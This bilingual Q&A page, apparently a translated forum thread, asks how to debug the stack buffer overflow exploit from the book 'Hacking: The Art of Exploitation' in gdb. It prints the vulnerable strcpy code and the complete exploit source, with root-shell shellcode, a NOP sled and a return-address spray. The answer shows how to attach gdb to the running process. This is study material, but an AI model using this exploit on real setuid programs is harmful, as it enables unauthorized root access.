黑客-剥削的艺术:调试缓冲区溢出示例 [英] Hacking - The Art of Exploitation: debugging buffer overflow example

问题描述

我正在读《黑客-剥削的艺术》这本书.有一个有关堆栈缓冲区溢出的示例.

I'm reading the book "Hacking - The Art of Exploitation". There is an example on a stack buffer overflow.

这是受攻击程序"notesearch"的一部分:

This is a part of the source of the attacked program, "notesearch":

char searchstring[100];
// ...
if(argc > 1)                      
    strcpy(searchstring, argv[1]);   // <-- no length check

这是攻击程序"exploit_notesearch"的来源:

And here is the source of the attacking program, "exploit_notesearch":

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";

int main(int argc, char *argv[]) {
   unsigned int i, *ptr, ret, offset=270;
   char *command, *buffer;

   command = (char *) malloc(200);
   bzero(command, 200); // zero out the new memory

   strcpy(command, "./notesearch \'"); // start command buffer
   buffer = command + strlen(command); // set buffer at the end

   if(argc > 1) // set offset
      offset = atoi(argv[1]);

   ret = (unsigned int) &i - offset; // set return address

   for(i=0; i < 160; i+=4) // fill buffer with return address
      *((unsigned int *)(buffer+i)) = ret;
   memset(buffer, 0x90, 60); // build NOP sled
   memcpy(buffer+60, shellcode, sizeof(shellcode)-1);

   strcat(command, "\'");
   // <-- dumping full command string here
   system(command); // run exploit
   free(command);
}

运行exploit_notesearch时，一切正常，由于notesearch程序具有suid权限，因此我将得到一个root shell.命令字符串包含要调用的程序的名称，NOP底座，shellcode以及该shellcode的返回地址.

When running exploit_notesearch, everything works fine, I'll get a root shell as the notesearch program has suid rights. The command string contains the name of the program to call, a NOP sled, the shellcode and the return adress to the shellcode.

我想用gdb调试漏洞利用程序，以了解漏洞利用是如何工作的.为此，我将命令字符串(恰好在调用system()之前)转储到文件中(我们将其称为dump.txt).然后从外壳程序中尝试获得相同的结果，我直接使用转储的命令字符串作为参数来调用被利用程序.

I want to debug the exploited program with gdb to see how the exploit exactly works. To do this, I dumped the command string (right before the call to system()) into a file (let's call it dump.txt). Then from a shell I tried to get the same result, I called the exploited program directly with the dumped command string as an argument.

提示> $(cat dump.txt)

prompt> $(cat dump.txt)

notesearch程序启动了，但是出现了根断层错误，而不是root shell.我还通过脚本在很大范围内改变了返回地址.

The notesearch program started, but instead of a root shell I got a segmentation fault. I've also varied the return adress in a very wide range via a script.

我的问题是，两者之间有什么区别

My question, what is the difference between:

• 通过 shell 启动 notesearch

• starting notesearch via the shell

通过系统启动便笺搜索

也许您还知道另一种通过gdb调试被利用程序的方法.

Maybe you also know another way to debug the exploited program via gdb.

推荐答案

使其正常工作:在notesearch程序main的开头添加了以下几行，该程序休眠45s:

Got it working: Added the following lines at the beginning of main in the notesearch program, which sleeps 45s:

#ifdef MY_DEBUG
printf("child running - sleep()\n");
fflush(stdout);
sleep(45);
printf("child running - sleep() finished\n");
#endif

然后，我启动exploit_notesearch，它自己开始进行notesearch，现在等待45s.在另一个shell中，我列出了所有正在运行的进程以获取notesearch进程的PID.然后，我运行gdb，附加到此过程，然后可以在调试器中观察漏洞利用情况.

Then I start exploit_notesearch, which itself starts notesearch which now waits 45s. In another shell I list all running processes to get the PID of the notesearch process. Then I run gdb, attach to this process, and can then watch the exploit in the debugger.

这篇关于黑客-剥削的艺术:调试缓冲区溢出示例的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！